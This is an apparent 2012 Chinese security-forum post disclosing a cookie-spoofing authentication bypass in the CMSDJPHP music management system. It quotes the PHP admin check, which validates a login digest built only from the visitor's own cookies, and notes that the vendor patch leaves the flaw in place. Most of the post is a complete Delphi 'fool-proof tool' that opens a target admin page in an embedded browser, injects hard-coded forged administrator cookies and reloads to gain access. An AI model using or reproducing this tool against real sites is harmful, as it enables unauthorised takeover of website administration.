CMSDJPHP 七禧舞曲管理系统cookies欺骗漏洞 0day

2012-12-23 21:36:09 19 3550
应该是通杀所有PHP版本。最新版本没有测试。从补丁来看,漏洞依然存在。
这是一个神级漏洞,体现了程序员的神逻辑。
看代码
admin/admin_check.php
<?php

// Version markers of this admin_check.php (1.0 series).
$CD_Version = "V1.0";
$CD_Build   = "20100501";
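/**
 * Checks that the permission id $CD_Permission appears in the comma-separated
 * CD_Permission cookie and calls AdminAlert() (defined elsewhere) when it does not.
 *
 * NOTE(review): the permission list is read from the client's own cookie, so
 * this function can only enforce what the visitor chooses to send; for it to be
 * an authorisation check at all, the list has to come from server-side state
 * (session or database), which this file does not show. The rewrite keeps the
 * cookie-driven interface and only tightens the matching: a missing cookie no
 * longer raises an undefined-index notice, entries are trimmed, and the
 * comparison is strict (the original `==` let "1abc" match 1 on PHP < 8).
 *
 * @param int|string $CD_Permission permission id required by the calling page
 * @return bool true when the id is present; false after AdminAlert() was called
 */
function admincheck($CD_Permission){
    $raw = isset($_COOKIE['CD_Permission']) ? (string)$_COOKIE['CD_Permission'] : '';
    if($raw === ''){
        AdminAlert('出错了,您没有进入本页面的权限!','',2);
        return false;
    }
    // trim each entry so "1, 2" still matches; compare the string forms strictly
    $menuarr = array_map('trim', explode(',', $raw));
    if(!in_array(trim((string)$CD_Permission), $menuarr, true)){
        AdminAlert('出错了,您没有进入本页面的权限!','',2);
        return false;
    }
    return true;
}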
// Login check. Every value fed to md5() below is taken from the request's own
// cookies, so a client that knows the cookie layout can produce a CD_Login that
// passes without ever authenticating. NOTE(review): the digest needs a
// server-side secret, or the check must compare against session/database state;
// neither appears in this file.
if(empty($_COOKIE['CD_AdminID'])){
AdminAlert('您没有进入本页面的权限,本次操作已被记录!','admin_login.php',0);
}elseif($_COOKIE['CD_Login']!=md5($_COOKIE['CD_AdminID'].$_COOKIE['CD_AdminUserName'].$_COOKIE['CD_AdminPassWord'].$_COOKIE['CD_Permission'])){// the key line: the digest is built only from cookie values
AdminAlert('您没有进入本页面的权限,本次操作已被记录!','admin_login.php',0);
}
刚刚看了官网最新补丁,只是注释了两条无关的代码而已:
// Version markers of the patched admin_check.php (1.1 series).
$CD_Version = 'V1.1';
$CD_Build   = '20121208';

        //if(!eregi($_SERVER['SERVER_NAME'],$_SERVER['HTTP_REFERER'])){
        //        echo "<br><p align=center><font color='red' style='font-size:9pt'>对不起,为了系统安全,不允许直接输入地址访问本系统的后台管理页面。</font></p>";
        //        exit();   
        //}

        function admincheck($CD_Permission){
                if($_COOKIE['CD_Permission']<>""){
                        $menuarr=explode(",",$_COOKIE['CD_Permission']);
                        $adminlogined="False";
                        for($i=0;$i<count($menuarr);$i++){
                                if($menuarr[$i]==$CD_Permission){$adminlogined="True";}
                        }
                        //if($adminlogined=="False"){AdminAlert("出错了,您没有进入本页面的权限!","",2);}
                }else{
                        //AdminAlert("出错了,您没有进入本页面的权限!","",2);
                }
        }

        // Login check, unchanged by the 1.1 patch. Every value fed to md5() is taken
        // from the request's own cookies, so a client that knows the cookie layout can
        // produce a CD_Login that passes without ever authenticating. NOTE(review): the
        // digest needs a server-side secret, or the check must compare against
        // session/database state; neither appears in this file.
        if(empty($_COOKIE['CD_AdminID'])){
                AdminAlert("您没有进入本页面的权限,本次操作已被记录!","admin_login.php",0);
        }elseif($_COOKIE['CD_Login']!=md5($_COOKIE['CD_AdminID'].$_COOKIE['CD_AdminUserName'].$_COOKIE['CD_AdminPassWord'].$_COOKIE['CD_Permission'])){
                AdminAlert("您没有进入本页面的权限,本次操作已被记录!","admin_login.php",0);
        }
利用,自己构造一个能让它计算正确的cookies,实在不知道安装一个系统。然后登陆一次。提取自己的cookies。使用delphi 画个webbrowser控件,设置下cookies,傻瓜化工具就诞生了。
unit uMain;
{
   T00ls首发
}

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, bsSkinData, BusinessSkinForm, bsSkinCtrls, OleCtrls, SHDocVw,
  StdCtrls, Mask, bsSkinBoxCtrls,MSHTML;

type
  { Main form: a URL row on top (pnlContorl) and two client-aligned panels below,
    one holding the embedded browser (pnlBrowser/wbAdmin) and one holding the
    progress gauge shown while a page loads (pnlLoading). The bs* fields are
    components of the BusinessSkinForm library listed in the uses clause. }
  TfrmMyFish = class(TForm)
    bsBusinessSkinForm1: TbsBusinessSkinForm;
    bsCompressedStoredSkin1: TbsCompressedStoredSkin;
    bsSkinData1: TbsSkinData;
    pnlContorl: TbsSkinPanel;        // top row: URL label/edit and the Go button
    pnlBrowser: TbsSkinPanel;        // hosts wbAdmin; shown once a page has loaded
    wbAdmin: TWebBrowser;            // embedded browser driven by btnGoClick
    lblURL: TbsSkinStdLabel;
    edtURL: TbsSkinEdit;             // URL passed to wbAdmin.Navigate
    btnGo: TbsSkinSpeedButton;
    lblFishAdmin: TbsSkinStdLabel;   // not referenced in this unit's code
    edtFishAdmin: TbsSkinEdit;       // not referenced in this unit's code
    pnlLoading: TbsSkinPanel;        // shown while wbAdmin is busy
    GaugeLoading: TbsSkinGauge;      // 0..100, updated from wbAdminProgressChange
    lblLoading: TbsSkinStdLabel;     // status caption under the gauge
    procedure btnGoClick(Sender: TObject);
    procedure FormResize(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure wbAdminProgressChange(Sender: TObject; Progress,
      ProgressMax: Integer);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

const
  { Cookie material the tool injects verbatim. Per the prose above these were
    captured from the author's own installation after one real login; they pass
    admin_check.php only because that script derives the CD_Login digest from the
    very cookie values it is checking, with no server-side secret or state. }
  COOKIE_HEAD = 'CD_Login=1df476c11ce215ad5a402afe5f370148; ';
  COOKIE_PASS = 'CD_AdminID=1; CD_AdminUserName=admin; CD_AdminPassWord=7622f895d131b0155232085e7b4a7654; CD_Permission=1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11; ';
var
  frmMyFish: TfrmMyFish;   // the form instance
  Doc: IHTMLDocument2;     // wbAdmin's document, fetched in btnGoClick to write cookies
  IsTrue: Boolean;         // not referenced in this unit
  iP: Integer;             // last load percentage computed in wbAdminProgressChange

implementation

{$R *.dfm}

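{ XOR every character of Text with XorPass. Symmetric: applying it twice with
  the same key restores the input. This is plain obfuscation, not encryption.
  Fix: the original sized the loop with StrLen(PChar(Text)), which stops at the
  first #0 and silently dropped everything after an embedded NUL; Length()
  covers the whole string.

  Text:    input string
  XorPass: key XORed into every character's ordinal
  Returns: string of the same length as Text }
function EncDecCode(Text: String; XorPass: Integer): String;
var
  i: Integer;
begin
  SetLength(Result, Length(Text));
  for i := 1 to Length(Text) do
    Result[i] := Chr(Ord(Text[i]) xor XorPass);
end;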

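{ Wrapper around EncDecCode with the fixed key 12.
  Fix: the original passed the result through a PChar cast, which truncates at
  the first #0; since XOR with 12 maps the character #12 to #0, that made the
  round trip lossy. The String result is now returned as is.

  Str:     input string
  Returns: Str with every character XORed with 12 }
function XCode(Str: String): String;
begin
  Result := EncDecCode(Str, 12);
end;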

{ Navigates wbAdmin to the URL in edtURL, waits for that load to finish, then
  writes each entry of COOKIE_HEAD + COOKIE_PASS into the document's cookie
  store and reloads the page. The server therefore receives admin-page requests
  carrying login cookies that no login request of its own ever issued; it accepts
  them only because admin_check.php validates cookies against themselves.
  NOTE(review): a server keeping session state would reject these on the
  reload; that is the mitigation, not anything client-side. }
procedure TfrmMyFish.btnGoClick(Sender: TObject);
var
  sCookies: string;
  sList: TStrings;
  i: Integer;
begin
  sCookies := COOKIE_HEAD + COOKIE_PASS;
  lblLoading.Caption := '正在努力···';
  pnlBrowser.Visible := False;
  pnlLoading.Visible := True;
  wbAdmin.Navigate(edtURL.Text);
  // pump messages until the first navigation completes (Busy drops to False)
  repeat
    Application.ProcessMessages;
    Sleep(50);
  until not wbAdmin.Busy;
  Doc := wbadmin.Document as IHTMLDocument2;
  sList := TStringList.Create;
  try
    // CommaText splits on commas and unquoted spaces, so each "name=value;"
    // becomes its own entry and is assigned to the document cookie one at a time
    sList.CommaText := sCookies;
    for i:=0 to sList.Count-1 do
    begin
      Doc.cookie := sList.Strings[i];
    end;
    pnlBrowser.Visible := True;
    pnlLoading.Visible := False;
    wbAdmin.Refresh;
  finally
    sList.Free;
  end;
end;

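{ Re-lays the URL row and the loading indicator whenever the form is resized.
  Fix: "Width div 100 * 70" truncated the width to a multiple of 100 before
  scaling (a 199 px panel produced 70 px instead of ~139); "Width * 70 div 100"
  is the intended 70 %. The label is now centred on its own width instead of the
  gauge's, which only agreed because both used the same formula. }
procedure TfrmMyFish.FormResize(Sender: TObject);
var
  SeventyPercent: Integer;
begin
  edtURL.Width := pnlContorl.Width - 150 - 100;
  btnGo.Left := pnlContorl.Width - 75;
  SeventyPercent := pnlLoading.Width * 70 div 100;
  GaugeLoading.Width := SeventyPercent;
  GaugeLoading.Left := (pnlLoading.Width - GaugeLoading.Width) div 2;
  GaugeLoading.Top := pnlLoading.Height div 2 - 100;
  lblLoading.Width := SeventyPercent;
  lblLoading.Left := (pnlLoading.Width - lblLoading.Width) div 2;
  lblLoading.Top := pnlLoading.Height div 2 + 50;
end;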

{ Initial layout: both panels and the browser fill the client area; the loading
  view is shown and the browser view hidden until btnGoClick has finished. }
procedure TfrmMyFish.FormCreate(Sender: TObject);
begin
  // geometry first
  pnlBrowser.Align := alClient;
  wbAdmin.Align := alClient;
  pnlLoading.Align := alClient;
  // then the initial visibility and gauge state
  pnlBrowser.Visible := False;
  pnlLoading.Visible := True;
  GaugeLoading.Value := 0;
  lblLoading.Caption := '初始化完毕。';
end;

{ Converts the browser's progress notification into a 0..100 value, stores it in
  the unit-level iP and shows it on GaugeLoading. Does nothing while ProgressMax
  is 0, which also avoids the division. }
procedure TfrmMyFish.wbAdminProgressChange(Sender: TObject; Progress,
  ProgressMax: Integer);
begin
  if ProgressMax = 0 then
    Exit;
  iP := (Progress * 100) div ProgressMax;
  GaugeLoading.Value := iP;
end;

end.
